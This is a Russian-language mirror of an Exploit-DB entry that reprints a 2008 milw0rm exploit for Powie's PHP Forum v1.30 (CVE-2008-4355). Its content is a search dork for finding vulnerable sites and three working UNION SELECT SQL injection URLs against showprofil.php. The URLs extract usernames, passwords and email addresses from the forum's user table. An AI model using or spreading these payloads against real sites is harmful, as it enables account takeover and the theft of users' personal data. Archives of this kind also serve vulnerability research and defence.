- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6442
- Проверка EDB
-
- Пройдено
- Автор
- TMH
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-4355
- Дата публикации
- 2008-09-12
Код:
#=====================================================================================================
#Powie's PHP Forum <= v1.30 (showprofil) Remote SQL Injection Exploit
#=====================================================================================================
#
#Critical Level : Dangerous
#
#Venedor site : http://www.powie.de
#
#Version : v1.30
#
#=====================================================================================================
#
#DORK : "pForum 1.30"
#
#
#Exploit :
#--------------------------------
#
#FOR USER: showprofil.php?id=1+LIMIT+1,1+UNION+SELECT+concat_ws(0x3a,username)+FROM+pfuser+limit+1,1--
#FOR PASS: showprofil.php?id=1+LIMIT+1,1+UNION+SELECT+concat_ws(0x3a,pwd)+FROM+pfuser+limit+1,1--
#FOR MAIL: showprofil.php?id=1+LIMIT+1,1+UNION+SELECT+concat_ws(0x3a,emai)+FROM+pfuser+limit+1,1--
#
#=====================================================================================================
#Discoverd By : -tmh-
#
#Contact : tmh[at]sys-flaw.com
#
#Greetz To : n00bor , Five-Three-Nine , J0hn.X3r , electron1x , meckl, Floo , -Patrick_B ,
# Loader007 , bizzit , Sys-Flaw , Codesoft , Free-Hack abcdef ,
#
#
#=====================================================================================================
# milw0rm.com [2008-09-12]- Источник
- www.exploit-db.com
